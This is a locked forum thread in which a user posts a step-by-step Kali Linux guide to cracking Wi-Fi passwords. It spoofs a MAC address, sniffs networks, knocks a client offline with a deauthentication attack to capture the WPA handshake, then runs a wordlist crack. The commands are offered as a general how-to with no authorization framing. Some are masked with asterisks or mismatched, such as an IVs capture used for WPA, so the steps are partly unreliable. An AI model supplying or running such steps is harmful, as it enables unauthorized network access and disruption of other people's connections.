What's new

Closed How can I häçk Wi-Fi passwords?

Status
Not open for further replies.
J

Jeanh

Guest
How can I häçk Wi-Fi passwords?

This is using kali-linux on Terminal. Bold letters are commands to be typed in Terminal

Step 1 : airmon-ng

The result will be something like :

Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]

Step 2 : airmon-ng start wlan0

Step 3 (Optional) :
Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 : airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 : airodump-ng -c 3 -w wpa***** --bssid ff:ff:ff:ff:ff:ff --ivs mon0

where
-c is the channel
-w is the file to be written
--bssid is the BSSID
Keep this terminal running.

Step 6 : open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.

Step 7 :
Use the John the Ripper as word list to ***** the WPA/WP2 password.air*****-ng -w /pentest/passwords/john/password.lst wpa*****-01.ivs

*^_^* para sa magagaling sa computer...
 
Dear @Jeanh,

Since 2 years have passed since the last reply in this thread, I am locking it to prevent necroposting. Feel free to start a new thread or contact any forum staff if you want this to be reopened.

Thread closed.
 
Status
Not open for further replies.
Back
Top